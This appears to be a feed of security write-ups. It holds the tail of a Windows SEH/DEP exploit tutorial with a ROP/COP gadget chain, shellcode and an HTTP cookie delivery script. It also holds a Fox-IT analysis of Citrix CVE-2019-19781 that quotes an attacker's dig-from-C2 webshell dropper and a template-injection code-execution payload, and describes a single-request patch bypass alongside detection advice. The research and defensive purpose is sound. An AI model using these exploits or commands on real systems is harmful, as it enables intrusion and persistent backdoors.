crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!VirtualParameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)


# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
"\x52\xff\xd0")

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

A Second Look at CVE-2019-19781 (Citrix NetScaler / ADC)

By: Fox IT
1 July 2020 at 03:50

Authors: Rich Warren of NCC Group FSAS & Yun Zheng Hu of Fox-IT, in close collaboration with Fox-IT’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

 

In this blog post we will revisit CVE-2019-19781, a Remote Code Execution vulnerability affecting Citrix NetScaler / ADC. We will explore how this issue has been widely abused by various actors and how a hacker turf war led to some actors “adversary patching” the vulnerability in order to prevent secondary compromise by competing adversaries – hiding the true number of vulnerable and compromised devices in the wild.

Following this, we will take a deep-dive into the vulnerability itself and present a previously unpublished technique which can be used to exploit CVE-2019-19781, without any vulnerable Perl file – bypassing the “adversary patching” techniques used by some attackers.

We will also provide statistics on exploitation, patching and backdoors we have identified in the wild.

Public Exploitation & Backdoors

Back in January 2020, shortly before the first public exploits for CVE-2019-19781 were released, Fox-IT built and deployed a number of honeypots in order to keep an eye on exploitation attempts by malicious actors. Additionally, we developed our own in-house exploit in order to study and understand the vulnerability, as well as to use it on our Red Team engagements.

On 10th January 2020, the first public exploits were released on GitHub. Shortly after this we started to see a significant uptick in both scanning and exploitation of the vulnerability. Most of the initial exploits weaponised by attackers came in the form of coin-miners, however a number of other “interesting” attacks were also observed within the first few days of exploitation. Typically, these involved a webshell being deployed to the compromised device.

This allowed us to collect a list of backdoors deployed by attackers, and subsequently develop signatures which could be used to identify backdoors as well as specific indicators of compromise. Following this, Fox-IT’s RIFT Team were able to gather statistics around patch adoption and backdoors deployed in the wild.

As an example, the following webshell was observed being dropped as part of a group of backdoors which we refer to as the “Iran Network Team” backdoors, first described in our Reddit live blog on January 13th 2020. It is important to note that although this particular actor used a C2 domain of cmd.irannetworkteam.org we have not made any attribution to Iran or any other state actor. At the time however, this particular attacker stood out as distinct from many other attackers, who appeared to be focused on deploying coin-miners.

Instead, this attacker appeared to be concerned with gaining remote persistent access to as many systems as possible, deploying a number of PHP webshells using the Project Zero India public exploit. These webshells would be deployed by issuing a “dig” command such as the following:

exec('dig cmd.irannetworkteam.org txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml');

This would fetch the webshell content via a TXT record hosted on the C2 domain. The content of which would be written to the following PHP file:

  • /var/vpn/themes/login.php

Variants were also observed, using the “logout.php” file instead, as well as staging payloads via Base64 encoded files named “readme.txt” and “read.txt”.

This PHP file was in fact a simple webshell, which did not require any authentication in order to interact with it, other than knowing the POST parameter name. According to our statistics, this attacker was largely successful in deploying their backdoor to a significant number of systems, many of which, although patched, are left vulnerable due to the password-less backdoor left open on their devices. This backdoor could be used not only by the original attacker, but also by any script-kiddie or state actor with knowledge of the webshell path and POST parameter name.

As well as backdoors, we were also able to identify specific exploitation artifacts. For example, when studying the “Iran Network Team” attacks, we noticed that the attacker would commonly stage secondary payloads within the public directory of the server, meaning that their presence could be easily detected.

Once the signatures for each backdoor variant were developed, analysis of the available data was carried out. This initially included 5 different known backdoors and artifacts and was done using data from late January 2020. This provided some interesting results, some of which are detailed below.

In January 2020 a total of 1030 compromised servers were identified. The majority of these compromised devices were situated in the US, with a total of 2057 backdoors and artifacts being identified. Many of these compromised devices included Governmental organizations and Fortune 500 companies. There appeared to be no specific sector that was targeted more than any other, however backdoors were observed on high-profile organisations from a number of industries including manufacturing, media, telecoms, healthcare, financial and technology.

 

Backdoors – Count by Country

However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security. This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.

Note that the Unknown hosts recorded below indicate hosts that did not respond with an expected HTTP request (e.g. a 403 or a 200)

Backdoored Servers – Patch Status

From Malware to Palware

Following the initial discovery of public exploitation of this vulnerability, the team at FireEye released their analysis of a new backdoor, named “NOTROBIN’, written in Golang.  What was different about this backdoor however, was that instead of deploying a coin-miner or a simple webshell, NOTROBIN would actually attempt to identify and remove any backdoors that had been installed prior to it, as well as attempt to block further exploitation by deleting new XML files or scripts that did not contain a per-infection secret key.

This marked a shift, at least for one actor, to a new type of infection, which DCSO eloquently described as “palware” – a seemingly innocent piece of malware with the primary goal of preventing other actors from deploying their own malware.

But was the actor behind NOTROBIN the only one to deploy this “palware” method? Possibly not. A number of anecdotal cases, as well as our own first-hand experience suggest that other attackers have also carried out “adversary patching” by deleting the vulnerable Perl scripts (such as newbm.pl) from compromised devices, thus preventing other attackers from exploiting the same issue, whilst maintaining access for themselves.

Whether or not this is in fact a separate actor, or actually a quirk of NOTROBIN’s backdoor removal function however, is not so clear. As mentioned earlier, one of the features of NOTROBIN’s backdoor removal function (aptly named remove_bds), is to remove any file within the /netscaler/portal/scripts/directory which has been recently modified and does not contain NOTROBIN’s secret key within either the filename or the contents. Of course this would include any backdoor that had been dropped by a previous attacker, however if one of the built-in scripts such as newbm.pl had been modified, perhaps as the result of a backdoor being added, this would also result in the removal of that file by NOTROBIN. This means that not only that the backdoor would be removed, but that the entire script, and all its legitimate functionality would be wiped out with it.

We have also responded on incident response cases where the “vulnerable” Perl files such as newbm.pl have been renamed to contain the NOTROBIN key, e.g.:

/netscaler/portal/scripts/<key>_newbm.pl

Effectively making the vulnerability only exploitable by an actor with prior knowledge of the infection key.

As a result, there are hosts, which on the surface appear to be patched, however have in fact been compromised by a previous attacker, and the “vulnerable” Perl files removed or renamed.

During the remainder of this blog post, we will discuss the inner workings of the Citrix vulnerability and exploit. We will then demonstrate a new exploitation technique which would allow an attacker to bypass both NOTROBIN’s patching method, as well as enable exploitation of a device that has had the vulnerable Perl scripts removed.

Vulnerability Deep Dive

Before we get into the details of bypassing the “adversary patch”, we will spend some time refreshing ourselves with what the vulnerability was, and how it is exploited.

TL;DR Version

Essentially, exploitation of this issue can be broken down into two steps which we will discuss in detail later. A short summary is given below:

  • Step 1: An HTTP request is made to a “vulnerable” Perl file. The attacker may or may not need to use directory traversal within the URL in order to access the Perl file, depending on whether the request is being made to a management or virtual IP interface. An HTTP header is supplied containing a directory traversal string to an XML file, which is to be written to disk. Note: A “vulnerable” Perl file is considered to be any Perl file which calls the `UserPrefs::csd` function followed by the `UserPrefs::filewrite` This is important, and typical of all public exploits.
  • Step 2: A follow-up HTTP request is then made, causing the crafted XML file to be rendered by the template engine, resulting in arbitrary code-execution.

Of course, we’ve skipped some steps here to simplify things, but the important thing to remember is the following limitations of this exploitation method:

  1. A “vulnerable” Perl file must exist on the system (which is certainly the case by default, however another attacker or a well-meaning administrator may have removed it)
  2. Two HTTP requests are required in order to achieve code execution.

Detailed Exploitation Steps

In order to fully understand the steps detailed above, let’s look at how the vulnerability works in detail, and explain why these steps are necessary. This should help us later to understand how to bypass the limitations.

If you are already familiar with the inner workings of the exploit you can skip over this next section.

For a good background on exploitation of this issue, please check out the MDSec blog post, which explains in great detail the vulnerability and exploitation steps. However for the sake of completeness (and to highlight a few specific things) we will explain it here too.

The CVE-2019-19781 “vulnerability” is in fact the CVE used to record the mitigation steps for a number of vulnerabilities which could be exploited together to achieve unauthenticated remote code execution. Citrix later released a patch to remediate the majority of these vulnerabilities used as part of the exploit chain.

Directory Traversal

The first of the vulnerabilities was a path canonicalisation issue which allowed requests to the Virtual IP (VIP) interface to bypass certain access control measures, if the request contained a directory traversal string. This essentially allowed an unauthenticated user to invoke Perl scripts which were not intended to be exposed via the public interface. This included Perl scripts within the /vpns/portal/scripts/directory, thus exposing any underlying vulnerabilities which might exist within the Perl scripts contained in this directory.

So, now the attacker is able to access certain Perl scripts within the “scripts” directory. However, another vulnerability is needed to turn that unintended access into arbitrary file write, and eventual code execution.

Controlled File Write

The next issue, a partially controlled file-write, existed within the UserPrefs.pm module. Specifically, within the csd function, which takes the value of the NSC_USER header supplied within the request and sets it as the $username variable. This username value is then later used to build the $self-&gt;{filename} instance variable without any form of sanitisation on the supplied value.

As shown in the following screenshots, the username value is taken directly from the HTTP header, before being concatenated with some predefined values to form the filename variable.

csd Function

 

User-controlled Filename

However, this alone does not lead to an exploitable condition. All it does is set a variable. We need to cause this value to be used for something useful. Given the name of the filename variable, we can make a pretty good guess at what it’s used for, and lo-and-behold there is indeed a function named file<strong>write, also contained within the UserPrefs.pm module.

filewrite Function

This function takes the username value, and again uses it to build a path to write out an XML file to the filesystem (note that it reconstructs the path from username again). The contents of this file are controlled via the $doc variable, which depending on when it is called, contains various user-controlled data.

So filewrite can be tricked into writing an XML file to an arbitrary location via a directory traversal in the HTTP header, but how do we trigger a call to filewrite, and how do we control the contents?

Well, as UserPrefs is a Perl module we cannot simply execute it directly via the URL traversal. Instead we need to find and invoke a Perl script, which makes use of the vulnerable functionality. For that we need to find a Perl file which:

  1. Is invokable as an unauthenticated user (i.e. contained in the `/vpns/portal/scripts` directory)
  2. Calls both `csd` and `filewrite` from the `UserPrefs.pm` module

As discussed in many blog posts and tweets, as well as used in a number of public exploits, the newbm.pl script fits this requirement.

First it instantiates a UserPrefs object (called $user), before calling the csd function on the $user object (remember, this allows us to control the filename via the NSC_USER header). It subsequently accepts some data provided by the user in the request, including a url, title and desc parameter. These parameters are set as instance variables of the $doc object and passed to the filewrite function, where the data is serialised to an XML file on disk. This means that we can now control the path of where the XML file is written, as well as some limited content, via the name, url or desc parameters.

Call to csd function:

Call to csd Function

User supplied data added to $newBM variable:

User-controlled Values

User controlled properties assigned to $doc before calling filewrite:

Values Passed to filewrite Function

Now we have a semi-controlled file-write where we can write an XML file anywhere on disk and control some of the content, however we need a way to leverage this to achieve code execution. This is where the Template Toolkit component comes into play.

Perl Code Execution

When a request is received by the Citrix server, the request is handled according to the Apache httpd.conf configuration, which contains a large number of complex redirect rules which ship off the request to a particular component depending on the request properties, such as the request path. Requests to the /vpns/portal/ path are handled by the Handler.pm Perl module via the PerlResponseHandler mod_perl directive in the httpd.conf file.

httpd.conf

Among other things (which we will explain later, or maybe some eagle-eyed readers may spot it in the screenshot), the Handler module simply takes the path specified within the request, forms a path to the requested file, and renders it via the Template Toolkit template engine.

Handler Function

This means that if we write our XML file to the templates directory, and inject template directives via the url, title or desc parameters, we can later cause the XML file to be rendered as a template using a follow-up HTTP request. Perfect!

However, there is one last hurdle. Although the Template Toolkit can allow code execution via template directives such as PERL and RAWPERL, these are disabled in the configuration used on the Citrix server. However, it was discovered that this same functionality could be achieved by abusing the global template object, which is exposed to all templates, to create a new BLOCK containing arbitrary Perl code, via a call to the template.new method. This allows the attacker to execute their code using a template directive such as the following:

[% template.new({ 'BLOCK' => 'print STDERR "ace.\n"; die' }) %]

Further details regarding this “feature” can be found in the GitHub issue.

Note that @0x09AL also identified another method to execute code via the DATAFILE plugin. This is also explained in the MDSec blog post.

 

 

Exploit Summary

So putting it all together, we need to:

  1. Make a request to the pl file with a directory traversal within the `NSC_USER` header, causing an XML file to be written to the templates directory.
  2. Inject a template directive into the dropped XML file, containing Perl code to be executed
  3. Make another request to the `/vpns/portal/<file>.xml` file in order to cause Handler.pm to render it via the template engine.

The above steps are the same as those carried out in the “Project Zero India” public exploit as well as the one subsequently released by TrustedSec shortly afterwards. It was also the same technique we and others had used in their own exploits. This resulted in some people (us included) believing that the following constraints could be relied upon for detection:

  1. The attacker must make two requests. First a POST request to write the XML file. Second, a GET request to render the XML file.
  2. The first request would be to the `newbm.pl` file
  3. The first request would contain an `NSC_USER` header containing a traversal string

Flawed Assumptions

Two days after the public exploits were released, @mpgn_x64 discovered that in fact any Perl file which called the csd function could be exploited, regardless of whether user-provided data was added to the written XML file.

@mpgn_x64 Tweet
Example using picktheme.pl (Step 1)
Example using picktheme.pl (Step 2)

 

This is possible because when the csd function is called, it eventually calls filewrite if the file does not already exist. This can be seen within the UserPrefs.pm file. When csd is called, it internally calls fileread on line 61:

Call to fileread Function

The fileread function checks if the specified file (constructed via $username value, taken from the NSC_USER header), exists or not.

User-controlled Values in fileread

If the file does not exist, then the initdoc function is called, which creates the XML file passing the $username value:

initdoc Function

Additionally, aside from the user controlled values (such as url, title, and desc used in newbm.pl), the filewrite function would also write the username within the XML file, which as we showed before, is controlled via the NSC_USER header. So, if we request a “vulnerable” .pl file with an NSC_USER value that contains the target XML file to be written, but also a template injection string we can exploit the issue without controlling any other values in the XML file!

After this we simply need to request the XML file, causing it to be rendered via the template engine, ensuring that we encode any non-URL safe characters within the template/path appropriately.

This dispelled the first myth – exploitation could in fact take place against any .pl file calling the csd function. This included the following files:

  • newbm.pl
  • rmbm.pl
  • themes.pl
  • picktheme.pl
  • navthemes.pl
  • personalbookmark.pl

Exploitation of this Method in the Wild

Shortly after this information was published, we started to see the first usage of this new exploitation technique deployed in the wild. This log extract shows some hits that were received in our Citrix honeypots, mostly from TOR exit nodes, starting from January 24th. Interestingly, these requests would write out a Perl backdoor line by line to a file named /netscaler/portal/scripts/loadcolourprefs.pl. This backdoor simply checked if the MD5 hash of the supplied password parameter matched a hardcoded value, and if so, would execute the command provided within the HTTP request.

The decoded webshell code is shown below. This appears to be a modified version of the PerlKit webshell.

https://gist.github.com/rxwx/c51264441107c5159324080c920a96d8.jsView this gist on GitHub

The details of this webshell were shared with our contacts at FireEye, who added detection to their IOC scanner script. Later the same month, further attacks were observed in the wild, distributing the same backdoor, in what appeared to be large distribution, non-targeted attacks. Just like with the Iran Network Team attacks, we are unable to provide any specific attribution due to limited visibility of post-exploitation activity.

Some more Quirks

To compound matters further, @superevr discovered that due to the way that the Citrix HTTP server handles requests, the exploit does not require a POST request followed by a GET request, and could be exploited with varying request methods. In fact the request method itself did not matter at all, and could be exploited even with a non-existent request method. The HTTP version number itself could also be meddled with, further frustrating efforts to detect exploitation attempts. Thanks to efforts by both the community and FireEye, detection methods were improved to take account for these “quirks”.

Refining the Exploit Further

Now we know that exploitation of this issue was not simply confined to one specific “vulnerable” .pl file, and that attackers are constantly evolving their attack techniques in order to overcome our assumptions of constraints of specific vulnerability exploitation, i.e. “how a well-behaving HTTP server should work. What other assumptions can we challenge? Well, in the next section we will show how we discovered that the issue can in fact be exploited:

  • With only a single HTTP Request
  • Without any “vulnerable” Perl file existing on the server
  • With only non-Perl files (.e.g. ping.html)
  • Without any existing file at all

In fact, this method can be used to exploit a vulnerable server even if an attacker has deleted all of the Perl files contained within the “scripts” directory – thus bypassing any “palware” patch that involves removing the vulnerable Perl scripts from the server. And best of all, the “exploit” fits in fewer than 280 characters.

To explain how this works, we need to take a step back and remember how the newbm.pl (and similar) exploits worked. You will recall that they all rely on the csd and filewrite functions being called, hence the need for a “vulnerable” .pl file. However, the csd function is also called outside of these Perl files.

If we take a look again at the Handler.pm module we can see that the csd function is actually called automatically whenever the Handler is invoked, which includes any time a file is served via the /portal/templates/* path. This means that whenever a request is made for a file within the templates directory (via a request to /vpns/portal/&lt;file&gt; which maps via the httpd.conf to the templates directory), the vulnerable code-path will be hit automatically, even if the requested file is an HTML or XML file, for example. The following screenshot highlights where the csd function is called within Handler.pm:

Handler.pm

As demonstrated by @mpgn_x64, all that is required for the exploit to succeed is a single call to the csd function (which itself calls filewrite), where we place both a template injection and directory traversal within the NSC_USER header. Therefore, putting this together, we can hit the vulnerable code without using any of the built-in Perl scripts. Requesting an existing file such as /vpns/portal/ping.html with a crafted NSC_USER header is enough to cause the XML file to be written to disk. An example request is shown below:

Dropping XML Payload with ping.html

Once the XML file has been written, we can then follow up with a request for the XML file, resulting in our code being executed:

Triggering Code Execution

So now we can exploit the issue without any vulnerable Perl file existing on the target server! But can we do better? Can the issue be exploited with only a single HTTP request to a non-existent file? Let’s take another look at the Handler.pm module.

On line 19, the csd function is called. As discussed, this causes our target XML file to be written to the templates directory:

Call to csd Function

Afterwards, on line 32 the requested file is rendered as a template:

Template Rendering

This means that our XML file is written just before the requested file is rendered. What if we craft a HTTP request that both writes and requests our XML file? The following screenshot shows how this works. First we send our crafted NSC_USER header, whilst also requesting the same file within the GET request path. This results in the XML file being first written, and then rendered straight afterwards, leading to code execution in a single HTTP request, without any vulnerable Perl file!

Successful Exploitation with Single Request

Note that aside from bypassing adversary patches that delete the “vulnerable” Perl files such as newbm.pl from the server, this method will also bypass the NOTROBIN method of checking for (and deleting) XML files within the template directory. This is due to a race-condition in that our XML file is written and rendered within the same request, and thus executed before it can be deleted.

Some Final Questions

Now we’ve shown a new method to exploit the vulnerability, and how to bypass adversary patches. However, we still have some other questions to answer.

Does the Citrix/FireEye IOC scanner detect this method?

Yes, it does. This is because their success_regexes[0] regex takes care of detecting any request (regardless of HTTP request method or version) that requests a file ending with .xml, which is a constraint of the vulnerability, and something which we cannot, as an attacker, control. The script additionally looks for responses with a 304 status code, which addresses a simple bypass technique of specifying an If-None-Match: * header to solicit a 304 instead of 200 status code.

Successful Detection via Regex

Furthermore, unless the attacker deletes the dropped .xml and compiled .ttc2 files, these will also be present on the filesystem and detectable via the IOC checker script. The following screenshot shows the Citrix/FireEye IOC scanner detecting exploitation via this technique:

IOC Scanner Detection

Readers may have read in FireEye’s “404 Exploit Not Found” blog post that the attacker behind the NOTROBIN attacks also used a single HTTP request method to exploit the issue. Our understanding is that this is not the same technique. The reason for this is that FireEye describes the attacker requesting thenewbm.pl Perl script via a POST request, resulting in a 304 response (presumably using the If-None-Match/If-Modified-Since trick). Discounting the fact that the request method can be arbitrary, our method does not make use of the newbm.pl file.

FireEye “404 Exploit Not Found” Blog

How can the single request exploit be detected?

As demonstrated above, the Citrix/FireEye IOC scanner still detects the single request variant from an endpoint perspective. Looking at the constraints of this new exploitation method, plus everything we have learned about obfuscation of request methods etc., we know that the request must:

  1. Contain `/vpns/portal/` within the path of the request
  2. Contain an `NSC_USER` header with a traversal `../` sequence
  3. End with `.xml`

However may:

  1. Be any request method type (e.g. `GET`, `HEAD`, `PUT`, `FOO`, `BAR`)
  2. Be split into multiple requests, e.g. one request to trigger the XML file drop, another to the XML (similar to the original exploit)
  3. Result in a 200 response, but could also result in a 304
  4. Contain a traversal `../` sequence in the request path – this depends on whether the request is made to the management or virtual IP interface

Finally, another question you may be wondering – perhaps you are worried that you applied the Citrix mitigation too late, and that an attacker may have “adversary patched” your Citrix server for you. Of course, in this scenario, the best course of action is to complete an examination of the server to identify any potential backdoors or attacker-deployed patches. For this, we thoroughly recommend the official IOC script provided by Citrix/FireEye. However, given that logs typically only persist for a couple of days, and that sophisticated actors may remove logs, it can be difficult to ascertain the level of intrusion by only looking at the Citrix device itself. If your device was patched after public exploits were released, it is highly likely that the device was compromised.

 

 

Latest Statistics

Here are the latest statistics based on the latest available data (as of June 2020):

 

 

Patched (but backdoored) vs. Unpatched (but backdoored)
  • 8115 servers were identified that are still vulnerable to CVE-2019-19781
  • Of the 8115 vulnerable servers, 2508 (30.9%) have indicators of adversary patching
    • These 2508 servers remain vulnerable due to the new discovery of the exploit method described in this blog
  • A total of 3,332 unique servers were identified to contain known indicators of compromise
  • 23% of the compromised servers had been officially patched, but were still backdoored
  • Many hosts contained multiple indicators and backdoors from distinct actors, in some cases up to 5 different indicators were observed
  • 49% of compromised devices were located in the US

 

 

Breakdown by Country

It has been just over six months since CVE-2019-119781 was first announced, and a mitigation made available. Yet the number of vulnerable and compromised found in the data based on in-the-wild hosts, is shockingly high. Furthermore, whilst we have been able to identify a subset of compromised devices, the true number is likely much higher. This is due to a number of reasons. Firstly, we were only able to observe a limited number of known IoCs, not all of which can be observed based on the datasets we have access to. Secondly the majority of the backdoors and webshells we’ve seen deployed still operate perfectly fine even after the server has been patched. These backdoors typically require no authentication or use a hardcoded password – meaning that anyone could use them as a method to gain remote access. We just don’t have a way of identifying the true number of patched-but-backdoored devices out there. Therefore, we believe that our statistics represent just the tip of the iceberg.

It can no longer be assumed that just because a device was patched, that it does not remain compromised. Nor can it be assumed that if a device was compromised and “patched” by one attacker, that it cannot be compromised by another attacker using the technique described in this publication. Not all attackers share the same motives. Whilst the MO of attackers deploying adversary patching might simply be to “hoard” access until later, other attackers may have more insidious, immediate motives, such as financial gain through ransomware. The most likely reason we haven’t seen many more backdoors deployed in the wild is due to adversary patching. However, as we have demonstrated – this provides both a false sense of security and obscures the true number of compromised devices that may be out there.

We hope that this publication helps to highlight the issue and provide additional visibility into techniques being used in the wild, as well as dispelling a few misconceptions about the vulnerability itself and demonstrates more robust ways to detect exploit variants. We urge organizations to ensure that their devices are not only patched, but that care is taken to ensure that latent compromises have been identified and remediated.

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

28 June 2020 at 08:41
SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

Introduction

Previous SMBleedingGhost write-ups: 

